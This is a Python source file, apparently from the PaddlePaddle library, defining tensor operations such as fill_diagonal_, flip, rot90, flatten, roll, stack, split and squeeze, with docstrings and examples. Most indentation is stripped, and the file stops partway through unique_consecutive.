from ..fluid.layers.nn import _elementwise_op_in_dygraph
from ..fluid import layers
from ..fluid.dygraph.inplace_utils import inplace_apis_in_dygraph_only
import paddle
from paddle import _C_ops
from paddle.tensor.attribute import _complex_to_real_dtype, _real_to_complex_dtype
__all__ = []
@dygraph_only
def fill_(x, value):
"""
**Notes**:
**This API is ONLY available in Dygraph mode**
    This function fills the Tensor with ``value`` in place.
    Args:
        x(Tensor): ``x`` is the Tensor to be filled in place
        value(Scalar): ``value`` is the value to be filled into x
    Returns:
        x(Tensor): Tensor x filled with value in place
Examples:
.. code-block:: python
import paddle
tensor = paddle.to_tensor([0, 1, 2, 3, 4])
tensor.fill_(0)
print(tensor.tolist()) #[0, 0, 0, 0, 0]
"""
if not isinstance(value, (float, int)):
raise TypeError(
"The type of 'value' must be int or float, but received %s." %
(type(value)))
return _C_ops.fill_any_(x, "value_float",
float(value), "value_int", int(value))
setattr(core.VarBase, 'fill_', fill_)
@dygraph_only
def zero_(x):
"""
**Notes**:
**This API is ONLY available in Dygraph mode**
    This function fills the Tensor with zero in place.
    Args:
        x(Tensor): ``x`` is the Tensor to be filled with zero in place
    Returns:
        x(Tensor): Tensor x filled with zero in place
Examples:
.. code-block:: python
import paddle
tensor = paddle.to_tensor([0, 1, 2, 3, 4])
tensor.zero_()
print(tensor.tolist()) #[0, 0, 0, 0, 0]
"""
return _C_ops.fill_any_(x, "value_float", 0., "value_int", int(0))
setattr(core.VarBase, 'zero_', zero_)
@dygraph_only
def fill_diagonal_(x, value, offset=0, wrap=False, name=None):
"""
**Notes**:
**This API is ONLY available in Dygraph mode**
    This function fills the value into the x Tensor's diagonal in place.
    Args:
        x(Tensor): ``x`` is the original Tensor
        value(Scalar): ``value`` is the value to be filled into x's diagonal
        offset(int,optional): the offset to the main diagonal. Default: 0 (main diagonal).
        wrap(bool,optional): the diagonal 'wrapped' after N columns for tall matrices.
name(str,optional): Name for the operation (optional, default is None)
Returns:
Tensor: Tensor with diagonal filled with value.
Returns type:
dtype is same as x Tensor
Examples:
.. code-block:: python
import paddle
x = paddle.ones((4, 3)) * 2
x.fill_diagonal_(1.0)
print(x.tolist()) #[[1.0, 2.0, 2.0], [2.0, 1.0, 2.0], [2.0, 2.0, 1.0], [2.0, 2.0, 2.0]]
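            # A further illustrative call (output omitted): offset=1 targets the
            # diagonal immediately above the main one; wrap controls repetition
            # for tall matrices, as described in Args.
            x.fill_diagonal_(0.0, offset=1)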
"""
helper = LayerHelper("fill_diagonal_", **locals())
check_type(x, 'X', (Variable), 'fill_diagonal_')
dtype = helper.input_dtype('x')
check_dtype(dtype, 'X',
['bool', 'float16', 'float32', 'float64', 'int32', 'int64'],
'fill_diagonal_')
check_type(value, 'value', (bool, int, float), 'fill_diagonal_')
check_type(wrap, 'wrap', (bool), 'fill_diagonal_')
inshape = x.shape
inshapeset = set(inshape)
assert len(inshape) >= 2, ('Tensor dims should >= 2 in fill_diagonal_ API')
if len(inshape) > 2:
assert len(inshapeset) == 1, (
'Tensor dims should be equal while input dims > 2 in fill_diagonal_ API'
)
if len(inshape) == 2:
return _C_ops.fill_diagonal_(x, 'value', value, 'offset', offset,
'wrap', wrap)
return _C_ops.fill_diagonal_(x, 'value', value, 'offset', offset, 'wrap',
True)
setattr(core.VarBase, 'fill_diagonal_', fill_diagonal_)
def _fill_diagonal_tensor_impl(x, y, offset=0, dim1=0, dim2=1, inplace=False):
inshape = x.shape
assert dim1 < len(inshape) and dim1 >= -len(inshape), (
'dim1 should between [-rank,rank) in fill_diagonal_tensor_')
assert dim2 < len(inshape) and dim2 >= -len(inshape), (
'dim2 should between [-rank,rank) in fill_diagonal_tensor_')
assert len(inshape) >= 2, (
'Tensor dims should >= 2 in fill_diagonal_tensor_')
dim1 %= len(inshape)
dim2 %= len(inshape)
predshape = []
for i in range(len(inshape)):
if i != dim1 and i != dim2:
predshape.append(inshape[i])
diaglen = min(
min(inshape[dim1], inshape[dim1] + offset),
min(inshape[dim2], inshape[dim2] - offset))
predshape.append(diaglen)
assert tuple(predshape) == tuple(y.shape), (
"the y shape should be {}".format(predshape))
if len(y.shape) == 1:
y = y.reshape([1, -1])
if inplace:
return _C_ops.fill_diagonal_tensor_(x, y, 'dim1', dim1, 'dim2', dim2,
'offset', offset)
return _C_ops.fill_diagonal_tensor(x, y, 'dim1', dim1, 'dim2', dim2,
'offset', offset)
def fill_diagonal_tensor_(x, y, offset=0, dim1=0, dim2=1, name=None):
"""
**Notes**:
**This API is ONLY available in Dygraph mode**
    This function fills the source Tensor y into the x Tensor's diagonal in place.
    Args:
        x(Tensor): ``x`` is the original Tensor
        y(Tensor): ``y`` is the Tensor to be filled into x's diagonal
dim1(int,optional): first dimension with respect to which to fill diagonal. Default: 0.
dim2(int,optional): second dimension with respect to which to fill diagonal. Default: 1.
offset(int,optional): the offset to the main diagonal. Default: 0 (main diagonal).
name(str,optional): Name for the operation (optional, default is None)
Returns:
Tensor: Tensor with diagonal filled with y.
Returns type:
list: dtype is same as x Tensor
Examples:
.. code-block:: python
import paddle
x = paddle.ones((4, 3)) * 2
y = paddle.ones((3,))
x.fill_diagonal_tensor_(y)
print(x.tolist()) #[[1.0, 2.0, 2.0], [2.0, 1.0, 2.0], [2.0, 2.0, 1.0], [2.0, 2.0, 2.0]]
"""
return _fill_diagonal_tensor_impl(
x, y, offset=offset, dim1=dim1, dim2=dim2, inplace=True)
setattr(core.VarBase, 'fill_diagonal_tensor_', fill_diagonal_tensor_)
def fill_diagonal_tensor(x, y, offset=0, dim1=0, dim2=1, name=None):
"""
    This function fills the source Tensor y into the x Tensor's diagonal.
    Args:
        x(Tensor): ``x`` is the original Tensor
        y(Tensor): ``y`` is the Tensor to be filled into x's diagonal
dim1(int,optional): first dimension with respect to which to fill diagonal. Default: 0.
dim2(int,optional): second dimension with respect to which to fill diagonal. Default: 1.
offset(int,optional): the offset to the main diagonal. Default: 0 (main diagonal).
name(str,optional): Name for the operation (optional, default is None)
Returns:
Tensor: Tensor with diagonal filled with y.
Returns type:
list: dtype is same as x Tensor
Examples:
.. code-block:: python
import paddle
x = paddle.ones((4, 3)) * 2
y = paddle.ones((3,))
nx = x.fill_diagonal_tensor(y)
print(nx.tolist()) #[[1.0, 2.0, 2.0], [2.0, 1.0, 2.0], [2.0, 2.0, 1.0], [2.0, 2.0, 2.0]]
"""
return _fill_diagonal_tensor_impl(
x, y, offset=offset, dim1=dim1, dim2=dim2, inplace=False)
setattr(core.VarBase, 'fill_diagonal_tensor', fill_diagonal_tensor)
@dygraph_only
def tolist(x):
"""
**Notes**:
**This API is ONLY available in Dygraph mode**
    This function translates the paddle.Tensor to a Python list.
    Args:
        x(Tensor): ``x`` is the Tensor to be translated to a Python list
Returns:
list: A list that contain the same value of current Tensor.
Returns type:
list: dtype is same as current Tensor
Examples:
.. code-block:: python
import paddle
t = paddle.to_tensor([0,1,2,3,4])
expectlist = t.tolist()
print(expectlist) #[0, 1, 2, 3, 4]
expectlist = paddle.tolist(t)
print(expectlist) #[0, 1, 2, 3, 4]
"""
return x.numpy().tolist()
setattr(core.VarBase, 'tolist', tolist)
def concat(x, axis=0, name=None):
"""
This OP concatenates the input along the axis.
Args:
x(list|tuple): ``x`` is a Tensor list or Tensor tuple which is with data type bool, float16,
float32, float64, int32, int64, uint8. All the Tensors in ``x`` must have same data type.
axis(int|Tensor, optional): Specify the axis to operate on the input Tensors.
It's a scalar with data type int or a Tensor with shape [1] and data type int32
or int64. The effective range is [-R, R), where R is Rank(x). When ``axis < 0``,
it works the same way as ``axis+R``. Default is 0.
name (str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
Tensor: A Tensor with the same data type as ``x``.
Examples:
.. code-block:: python
import paddle
x1 = paddle.to_tensor([[1, 2, 3],
[4, 5, 6]])
x2 = paddle.to_tensor([[11, 12, 13],
[14, 15, 16]])
x3 = paddle.to_tensor([[21, 22],
[23, 24]])
zero = paddle.full(shape=[1], dtype='int32', fill_value=0)
# When the axis is negative, the real axis is (axis + Rank(x))
# As follow, axis is -1, Rank(x) is 2, the real axis is 1
out1 = paddle.concat(x=[x1, x2, x3], axis=-1)
out2 = paddle.concat(x=[x1, x2], axis=0)
out3 = paddle.concat(x=[x1, x2], axis=zero)
# out1
# [[ 1 2 3 11 12 13 21 22]
# [ 4 5 6 14 15 16 23 24]]
# out2 out3
# [[ 1 2 3]
# [ 4 5 6]
# [11 12 13]
# [14 15 16]]
"""
return paddle.fluid.layers.concat(input=x, axis=axis, name=name)
def broadcast_tensors(input, name=None):
"""
This OP broadcast a list of tensors following broadcast semantics
.. note::
If you want know more about broadcasting, please refer to :ref:`user_guide_broadcasting`.
Args:
input(list|tuple): ``input`` is a Tensor list or Tensor tuple which is with data type bool,
float16, float32, float64, int32, int64. All the Tensors in ``input`` must have same data type.
Currently we only support tensors with rank no greater than 5.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`.
Returns:
list(Tensor): The list of broadcasted tensors following the same order as ``input``.
Examples:
.. code-block:: python
import paddle
x1 = paddle.rand([1, 2, 3, 4]).astype('float32')
x2 = paddle.rand([1, 2, 1, 4]).astype('float32')
x3 = paddle.rand([1, 1, 3, 1]).astype('float32')
out1, out2, out3 = paddle.broadcast_tensors(input=[x1, x2, x3])
# out1, out2, out3: tensors broadcasted from x1, x2, x3 with shape [1,2,3,4]
"""
num_inputs = len(input)
if in_dygraph_mode():
return _C_ops.broadcast_tensors(input, num_inputs)
check_type(input, 'input', (list, tuple), 'broadcast_tensors')
if num_inputs < 1:
raise TypeError(
"At least 1 tensor is needed to perform broadcast_tensors")
# Check input types
for id, x in enumerate(input):
check_variable_and_dtype(
x, 'input[' + str(id) + ']',
['bool', 'float32', 'float64', 'int32', 'int64'],
'broadcast_tensors')
if x.dtype != input[0].dtype:
raise TypeError(
"All the Tensors in the input must have the same data type.")
# Check bcast semantics
output_shape_r_last_tensor_index = []
output_shape_r = []
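    # output_shape_r accumulates the broadcast shape in reversed (trailing-first)
    # order, while output_shape_r_last_tensor_index records which input last
    # fixed each dimension so that conflicts can be reported precisely.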
# Use while loop due to weird behaviour of "range()"
j = 0
while j < len(input):
tensor = input[j]
shape = list(reversed(tensor.shape))
i = 0
while i < len(shape):
if len(output_shape_r) <= i:
output_shape_r.append(shape[i])
output_shape_r_last_tensor_index.append(j)
else:
invalid = (output_shape_r[i] != shape[i] and
output_shape_r[i] != 1 and shape[i] != 1)
if invalid:
last_index = output_shape_r_last_tensor_index[i]
                    raise TypeError(
                        "Input tensors to broadcast_tensors does not follow bcast semantics. "
                        "Tensor {} conflicts with Tensor {} in reversed dimension {}".format(
                            last_index, j, i))
if output_shape_r[i] <= shape[i]:
output_shape_r[i] = shape[i]
output_shape_r_last_tensor_index[i] = j
i += 1 # while i < len(shape)
j += 1 # while j < len(input)
helper = LayerHelper('broadcast_tensors', **locals())
i = 0
out = []
while i < num_inputs:
out.append(
helper.create_variable_for_type_inference(dtype=helper.input_dtype(
)))
i += 1
inputs = {'X': input}
helper.append_op(
type='broadcast_tensors', inputs=inputs, outputs={'Out': out},
attrs={})
return out
def flip(x, axis, name=None):
"""
    Reverse the order of an n-D tensor along the given axis (or axes).
Args:
x (Tensor): A Tensor(or LoDTensor) with shape :math:`[N_1, N_2,..., N_k]` . The data type of the input Tensor x
should be float32, float64, int32, int64, bool.
axis (list|tuple|int): The axis(axes) to flip on. Negative indices for indexing from the end are accepted.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: Tensor or LoDTensor calculated by flip layer. The data type is same with input x.
Examples:
.. code-block:: python
import paddle
import numpy as np
image_shape=(3, 2, 2)
x = np.arange(image_shape[0] * image_shape[1] * image_shape[2]).reshape(image_shape)
x = x.astype('float32')
img = paddle.to_tensor(x)
tmp = paddle.flip(img, [0,1])
print(tmp) # [[[10,11],[8, 9]], [[6, 7],[4, 5]], [[2, 3],[0, 1]]]
out = paddle.flip(tmp,-1)
print(out) # [[[11,10],[9, 8]], [[7, 6],[5, 4]], [[3, 2],[1, 0]]]
"""
if isinstance(axis, int):
axis = [axis]
if in_dygraph_mode():
return _C_ops.flip(x, "axis", axis)
helper = LayerHelper("flip", **locals())
check_type(x, 'X', (Variable), 'flip')
dtype = helper.input_dtype('x')
check_dtype(dtype, 'X',
['float16', 'float32', 'float64', 'int32', 'int64', 'bool'],
'flip')
check_type(axis, 'axis', (list, tuple), 'flip')
if name is None:
out = helper.create_variable_for_type_inference(dtype)
else:
out = helper.create_variable(name=name, dtype=dtype, persistable=False)
helper.append_op(
type="flip",
inputs={"X": x},
outputs={"Out": out},
attrs={"axis": axis})
return out
def rot90(x, k=1, axes=[0, 1], name=None):
"""
    Rotate an n-D tensor by 90 degrees. The number of rotations and the plane of rotation are specified by k and axes: the rotation goes from axes[0] towards axes[1] if k > 0, and from axes[1] towards axes[0] if k < 0.
Args:
x (Tensor): The input Tensor(or LoDTensor). The data type of the input Tensor x
should be float16, float32, float64, int32, int64, bool. float16 is only supported on gpu.
k (int, optional): Direction and number of times to rotate, default value: 1.
axes (list|tuple, optional): Axes to rotate, dimension must be 2. default value: [0, 1].
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: Tensor or LoDTensor calculated by rot90 layer. The data type is same with input x.
Examples:
.. code-block:: python
import paddle
data = paddle.arange(4)
data = paddle.reshape(data, (2, 2))
print(data)
#[[0, 1],
# [2, 3]]
y = paddle.rot90(data, 1, [0, 1])
print(y)
#[[1, 3],
# [0, 2]]
y= paddle.rot90(data, -1, [0, 1])
print(y)
#[[2, 0],
# [3, 1]]
data2 = paddle.arange(8)
data2 = paddle.reshape(data2, (2,2,2))
print(data2)
#[[[0, 1],
# [2, 3]],
# [[4, 5],
# [6, 7]]]
y = paddle.rot90(data2, 1, [1, 2])
print(y)
#[[[1, 3],
# [0, 2]],
# [[5, 7],
# [4, 6]]]
"""
helper = LayerHelper("rot90", **locals())
check_type(x, 'X', (Variable), 'rot90')
dtype = helper.input_dtype('x')
check_dtype(dtype, 'X',
['float16', 'float32', 'float64', 'int32', 'int64', 'bool'],
'rot90')
check_type(axes, 'axes', (list, tuple), 'rot90')
input_total_dims = len(x.shape)
total_rot_dims = len(axes)
if total_rot_dims != 2:
raise ValueError("expected total rotation axes == 2, but got axes = {}".
format(total_rot_dims))
if input_total_dims < 2:
raise ValueError("expected total dims >= 2, but got total dims = {}".
format(input_total_dims))
if not (axes[0] != axes[1] and abs(axes[0] - axes[1]) != input_total_dims):
raise ValueError(
"expected rotation axes to be different, but got axis0 = {}, and axis1 = {}".
format(axes[0], axes[1]))
if not (axes[0] < input_total_dims and axes[0] >= -input_total_dims):
raise ValueError("Rotation axis0 out of range, axis0 = {}".format(axes[
0]))
if not (axes[1] < input_total_dims and axes[1] >= -input_total_dims):
raise ValueError("Rotation axis1 out of range, axis1 = {}".format(axes[
1]))
k %= 4
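    # With k normalised to [0, 4): k == 0 is the identity, k == 2 flips both
    # rotation axes, and k == 1 / k == 3 combine a flip along one axis with a
    # transpose of the two rotation axes, in opposite orders.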
if k == 0:
return x
if k == 2:
return flip(flip(x, axes[0]), axes[1])
axes_list = list(range(0, input_total_dims))
(axes_list[axes[0]], axes_list[axes[1]]) = (axes_list[axes[1]],
axes_list[axes[0]])
if k == 1:
return transpose(flip(x, axes[1]), axes_list)
else:
# k == 3
return flip(transpose(x, axes_list), axes[1])
def flatten(x, start_axis=0, stop_axis=-1, name=None):
r"""
**Flatten op**
Flattens a contiguous range of axes in a tensor according to start_axis and stop_axis.
Note that the output Tensor will share data with origin Tensor and doesn't have a
Tensor copy in ``dygraph`` mode. If you want to use the Tensor copy version, please
use `Tensor.clone` like ``flatten_clone_x = x.flatten().clone()``.
For Example:
.. code-block:: text
Case 1:
Given
X.shape = (3, 100, 100, 4)
and
start_axis = 1
          stop_axis = 2
        We get:
          Out.shape = (3, 100 * 100, 4)
Case 2:
Given
X.shape = (3, 100, 100, 4)
and
start_axis = 0
stop_axis = -1
We get:
          Out.shape = (3 * 100 * 100 * 4, )
Args:
x (Tensor): A tensor of number of dimentions >= axis. A tensor with data type float32,
float64, int8, int32, int64, uint8.
start_axis (int): the start axis to flatten
stop_axis (int): the stop axis to flatten
name(str, Optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Returns:
Tensor: A tensor with the contents of the input tensor, with input \
axes flattened by indicated start axis and end axis. \
A Tensor with data type same as input x.
Raises:
ValueError: If x is not a Tensor.
ValueError: If start_axis or stop_axis is illegal.
Examples:
.. code-block:: python
import paddle
image_shape=(2, 3, 4, 4)
x = paddle.arange(end=image_shape[0] * image_shape[1] * image_shape[2] * image_shape[3])
img = paddle.reshape(x, image_shape)
out = paddle.flatten(img, start_axis=1, stop_axis=2)
# out shape is [2, 12, 4]
# out shares data with img in dygraph mode
img[0, 0, 0, 0] = -1
print(out[0, 0, 0]) # [-1]
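            # A further example following Case 2 above: flattening every axis
            # collapses the tensor to 1-D.
            out_all = paddle.flatten(img)
            print(out_all.shape) # [96]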
"""
if not (isinstance(x, Variable)):
raise ValueError("The input x should be a Tensor")
if not in_dygraph_mode():
check_variable_and_dtype(
x, 'x', ['float32', 'float64', 'int8', 'int32', 'int64', 'uint8'],
'flatten')
x_dim = len(x.shape)
if not (isinstance(start_axis, int)) or (
start_axis > x_dim - 1) or start_axis < -x_dim:
raise ValueError(
"The start_axis should be a int, and in range [-rank(x), rank(x))")
if not (isinstance(stop_axis, int)) or (
stop_axis > x_dim - 1) or stop_axis < -x_dim:
raise ValueError(
"The stop_axis should be a int, and in range [-rank(x), rank(x))")
if start_axis < 0:
start_axis = start_axis + x_dim
if stop_axis < 0:
stop_axis = stop_axis + x_dim
if start_axis > stop_axis:
raise ValueError("The stop_axis should be larger than stat_axis")
if in_dygraph_mode():
dy_out, _ = _C_ops.flatten_contiguous_range(x, 'start_axis', start_axis,
'stop_axis', stop_axis)
return dy_out
helper = LayerHelper('flatten', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
x_shape = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='flatten_contiguous_range',
inputs={"X": x},
outputs={'Out': out,
'XShape': x_shape},
attrs={"start_axis": start_axis,
"stop_axis": stop_axis})
return out
@inplace_apis_in_dygraph_only
def flatten_(x, start_axis=0, stop_axis=-1, name=None):
"""
Inplace version of ``flatten`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_tensor_flatten`.
"""
if not (isinstance(x, Variable)):
raise ValueError("The input x should be a Tensor")
x_dim = len(x.shape)
if not (isinstance(start_axis, int)) or (
start_axis > x_dim - 1) or start_axis < -x_dim:
raise ValueError(
"The start_axis should be a int, and in range [-rank(x), rank(x))")
if not (isinstance(stop_axis, int)) or (
stop_axis > x_dim - 1) or stop_axis < -x_dim:
raise ValueError(
"The stop_axis should be a int, and in range [-rank(x), rank(x))")
if start_axis < 0:
start_axis = start_axis + x_dim
if stop_axis < 0:
stop_axis = stop_axis + x_dim
if start_axis > stop_axis:
raise ValueError("The stop_axis should be larger than stat_axis")
dy_out, _ = _C_ops.flatten_contiguous_range_(x, 'start_axis', start_axis,
'stop_axis', stop_axis)
return dy_out
def roll(x, shifts, axis=None, name=None):
"""
    Roll the `x` tensor along the given axis(axes). Elements that roll beyond
    the last position are re-introduced at the first position according to 'shifts'.
    If an axis is not specified,
    the tensor will be flattened before rolling and then restored to the original shape.
Args:
x (Tensor): The x tensor as input.
shifts (int|list|tuple): The number of places by which the elements
of the `x` tensor are shifted.
axis (int|list|tuple|None): axis(axes) along which to roll.
Returns:
Tensor: A Tensor with same data type as `x`.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1.0, 2.0, 3.0],
[4.0, 5.0, 6.0],
[7.0, 8.0, 9.0]])
out_z1 = paddle.roll(x, shifts=1)
print(out_z1)
#[[9. 1. 2.]
# [3. 4. 5.]
# [6. 7. 8.]]
out_z2 = paddle.roll(x, shifts=1, axis=0)
print(out_z2)
#[[7. 8. 9.]
# [1. 2. 3.]
# [4. 5. 6.]]
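            # A further sketch, with the output inferred from the same semantics:
            out_z3 = paddle.roll(x, shifts=1, axis=1)
            print(out_z3)
            #[[3. 1. 2.]
            # [6. 4. 5.]
            # [9. 7. 8.]]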
"""
origin_shape = x.shape
if type(shifts) == int:
shifts = [shifts]
if type(axis) == int:
axis = [axis]
len_origin_shape = len(origin_shape)
if axis is not None:
for i in range(len(axis)):
if axis[i] >= len_origin_shape or axis[i] < -len_origin_shape:
raise ValueError(
"axis is out of range, it should be in range [{}, {}), but received {}".
format(-len_origin_shape, len_origin_shape, axis))
else:
axis = []
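        # An empty axis list tells the kernel to flatten the tensor, roll it,
        # and then restore the original shape, as described in the docstring.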
if in_dygraph_mode():
return _C_ops.roll(x, 'axis', axis, 'shifts', shifts)
helper = LayerHelper("roll", **locals())
check_type(axis, 'axis', (list, tuple), 'roll')
out = helper.create_variable_for_type_inference(x.dtype)
if isinstance(shifts, Variable):
helper.append_op(
type='roll',
inputs={'X': x,
"ShiftsTensor": shifts},
outputs={'Out': out},
attrs={'axis': axis})
else:
check_type(shifts, 'shifts', (list, tuple), 'roll')
helper.append_op(
type='roll',
inputs={'X': x},
outputs={'Out': out},
attrs={'axis': axis,
'shifts': shifts})
return out
def stack(x, axis=0, name=None):
"""
    This OP stacks all the input tensors ``x`` along the ``axis`` dimension.
All tensors must be of the same shape and same dtype.
For example, given N tensors of shape [A, B], if ``axis == 0``, the shape of stacked
tensor is [N, A, B]; if ``axis == 1``, the shape of stacked
tensor is [A, N, B], etc.
.. code-block:: text
Case 1:
Input:
x[0].shape = [1, 2]
x[0].data = [ [1.0 , 2.0 ] ]
x[1].shape = [1, 2]
x[1].data = [ [3.0 , 4.0 ] ]
x[2].shape = [1, 2]
x[2].data = [ [5.0 , 6.0 ] ]
Attrs:
axis = 0
Output:
Out.dims = [3, 1, 2]
Out.data =[ [ [1.0, 2.0] ],
[ [3.0, 4.0] ],
[ [5.0, 6.0] ] ]
Case 2:
Input:
x[0].shape = [1, 2]
x[0].data = [ [1.0 , 2.0 ] ]
x[1].shape = [1, 2]
x[1].data = [ [3.0 , 4.0 ] ]
x[2].shape = [1, 2]
x[2].data = [ [5.0 , 6.0 ] ]
Attrs:
axis = 1 or axis = -2 # If axis = -2, axis = axis+ndim(x[0])+1 = -2+2+1 = 1.
Output:
Out.shape = [1, 3, 2]
Out.data =[ [ [1.0, 2.0]
[3.0, 4.0]
[5.0, 6.0] ] ]
Args:
x (list[Tensor]|tuple[Tensor]): Input ``x`` can be a ``list`` or ``tuple`` of tensors, the Tensors in ``x``
must be of the same shape and dtype. Supported data types: float32, float64, int32, int64.
axis (int, optional): The axis along which all inputs are stacked. ``axis`` range is ``[-(R+1), R+1)``,
where ``R`` is the number of dimensions of the first input tensor ``x[0]``.
If ``axis < 0``, ``axis = axis+R+1``. The default value of axis is 0.
name (str, optional): Please refer to :ref:`api_guide_Name`, Default None.
Returns:
Tensor: The stacked tensor with same data type as input.
Example:
.. code-block:: python
import paddle
x1 = paddle.to_tensor([[1.0, 2.0]])
x2 = paddle.to_tensor([[3.0, 4.0]])
x3 = paddle.to_tensor([[5.0, 6.0]])
out = paddle.stack([x1, x2, x3], axis=0)
print(out.shape) # [3, 1, 2]
print(out)
# [[[1., 2.]],
# [[3., 4.]],
# [[5., 6.]]]
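            # Stacking the same inputs along axis=1 follows Case 2 above:
            out_axis1 = paddle.stack([x1, x2, x3], axis=1)
            print(out_axis1.shape) # [1, 3, 2]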
"""
return layers.stack(x, axis, name)
def split(x, num_or_sections, axis=0, name=None):
"""
Split the input tensor into multiple sub-Tensors.
Args:
x (Tensor): A N-D Tensor. The data type is bool, float16, float32, float64, int32 or int64.
num_or_sections (int|list|tuple): If ``num_or_sections`` is an int, then ``num_or_sections``
indicates the number of equal sized sub-Tensors that the ``x`` will be divided into.
If ``num_or_sections`` is a list or tuple, the length of it indicates the number of
sub-Tensors and the elements in it indicate the sizes of sub-Tensors' dimension orderly.
The length of the list must not be larger than the ``x`` 's size of specified ``axis``.
axis (int|Tensor, optional): The axis along which to split, it can be a scalar with type
``int`` or a ``Tensor`` with shape [1] and data type ``int32`` or ``int64``.
            If :math:`axis < 0`, the axis to split along is :math:`rank(x) + axis`. Default is 0.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
list(Tensor): The list of segmented Tensors.
Example:
.. code-block:: python
import paddle
# x is a Tensor of shape [3, 9, 5]
x = paddle.rand([3, 9, 5])
out0, out1, out2 = paddle.split(x, num_or_sections=3, axis=1)
print(out0.shape) # [3, 3, 5]
print(out1.shape) # [3, 3, 5]
print(out2.shape) # [3, 3, 5]
out0, out1, out2 = paddle.split(x, num_or_sections=[2, 3, 4], axis=1)
print(out0.shape) # [3, 2, 5]
print(out1.shape) # [3, 3, 5]
print(out2.shape) # [3, 4, 5]
out0, out1, out2 = paddle.split(x, num_or_sections=[2, 3, -1], axis=1)
print(out0.shape) # [3, 2, 5]
print(out1.shape) # [3, 3, 5]
print(out2.shape) # [3, 4, 5]
# axis is negative, the real axis is (rank(x) + axis)=1
out0, out1, out2 = paddle.split(x, num_or_sections=3, axis=-2)
print(out0.shape) # [3, 3, 5]
print(out1.shape) # [3, 3, 5]
print(out2.shape) # [3, 3, 5]
"""
return paddle.fluid.layers.split(
input=x, num_or_sections=num_or_sections, dim=axis, name=name)
def squeeze(x, axis=None, name=None):
"""
This OP will squeeze the dimension(s) of size 1 of input tensor x's shape.
Note that the output Tensor will share data with origin Tensor and doesn't have a
Tensor copy in ``dygraph`` mode. If you want to use the Tensor copy version,
please use `Tensor.clone` like ``squeeze_clone_x = x.squeeze().clone()``.
    If axis is provided, the dimension(s) of size 1 at the given axis (axes) will be removed.
    If the dimension at a given axis is not of size 1, that dimension remains unchanged.
    If axis is not provided, all dimensions of size 1 will be removed.
.. code-block:: text
Case1:
Input:
                x.shape = [1, 3, 1, 5]  # If axis is not provided, all dimensions of size 1 will be removed.
axis = None
Output:
out.shape = [3, 5]
Case2:
Input:
x.shape = [1, 3, 1, 5] # If axis is provided, it will remove the dimension(s) by given axis that of size 1.
axis = 0
Output:
out.shape = [3, 1, 5]
        Case3:
            Input:
                x.shape = [1, 3, 1, 5]  # If the dimension at a given axis (here 3) is not of size 1, that dimension remains unchanged.
axis = [0, 2, 3]
Output:
out.shape = [3, 5]
Case4:
Input:
x.shape = [1, 3, 1, 5] # If axis is negative, axis = axis + ndim (number of dimensions in x).
axis = [-2]
Output:
out.shape = [1, 3, 5]
Args:
x (Tensor): The input Tensor. Supported data type: float32, float64, bool, int8, int32, int64.
axis (int|list|tuple, optional): An integer or list/tuple of integers, indicating the dimensions to be squeezed. Default is None.
The range of axis is :math:`[-ndim(x), ndim(x))`.
If axis is negative, :math:`axis = axis + ndim(x)`.
If axis is None, all the dimensions of x of size 1 will be removed.
name (str, optional): Please refer to :ref:`api_guide_Name`, Default None.
Returns:
Tensor: Squeezed Tensor with the same data type as input Tensor.
Examples:
.. code-block:: python
import paddle
x = paddle.rand([5, 1, 10])
output = paddle.squeeze(x, axis=1)
print(x.shape) # [5, 1, 10]
print(output.shape) # [5, 10]
# output shares data with x in dygraph mode
x[0, 0, 0] = 10.
print(output[0, 0]) # [10.]
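            # Illustrative: with axis=None every dimension of size 1 is removed
            # (Case 1 above).
            y = paddle.rand([1, 3, 1, 5])
            print(paddle.squeeze(y).shape) # [3, 5]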
"""
if axis is None:
axis = []
elif isinstance(axis, int):
axis = [axis]
elif isinstance(axis, tuple):
axis = list(axis)
return layers.squeeze(x, axis, name)
@inplace_apis_in_dygraph_only
def squeeze_(x, axis=None, name=None):
"""
Inplace version of ``squeeze`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_paddle_tensor_squeeze`.
"""
if axis is None:
axis = []
elif isinstance(axis, int):
axis = [axis]
elif isinstance(axis, tuple):
axis = list(axis)
out, _ = _C_ops.squeeze2_(x, 'axes', axis)
return out
def unique_consecutive(x,
return_inverse=False,
return_counts=False,
axis=None,
dtype="int64",
name=None):
r"""
Eliminates all but the first element from every consecutive group of equivalent elements.
    .. note:: This function is different from :func:`paddle.unique` in the sense that this function
        only eliminates consecutive duplicate values. Its semantics are similar to `std::unique` in C++.
Args:
        x(Tensor): the input tensor, its data type should be float32, float64, int32, int64.
return_inverse(bool, optional): If True, also return the indices for where elements in
the original input ended up in the returned unique consecutive tensor. Default is False.
return_counts(bool, optional): If True, also return the counts for each unique consecutive element.
Default is False.
axis(int, optional): The axis to apply unique consecutive. If None, the input will be flattened.
Default is None.
        dtype(np.dtype|str, optional): The data type of the `inverse` tensor: int32 or int64.
Default: int64.
name(str, optional): Name for the operation. For more information, please refer to
:ref:`api_guide_Name`. Default is None.
Returns:
tuple: (out, inverse, counts). `out` is the unique consecutive tensor for `x`. `inverse` is provided only if `return_inverse` is True. `counts` is provided only if `return_counts` is True.
Example:
.. code-block:: python
import paddle
x = paddle.to_tensor([1, 1, 2, 2, 3, 1, 1, 2])
output = paddle.unique_consecutive(x) #
np_output = output.numpy() # [1 2 3 1 2]
_, inverse, counts = paddle.unique_consecutive(x, return_inverse=True, return_counts=True)
np_inverse = inverse.numpy() # [0 0 1 1 2 3 3 4]
            np_counts = counts.numpy() # [2 2 1 2 1]
            x = paddle.to_tensor([[2, 1, 3], [3, 0, 1], [2, 1, 3], [2, 1, 3]])
            output = paddle.unique_consecutive(x, axis=0)
            np_output = output.numpy()
            # [[2 1 3]
            #  [3 0 1]
            #  [2 1 3]]
"""
if axis is None:
axis = []
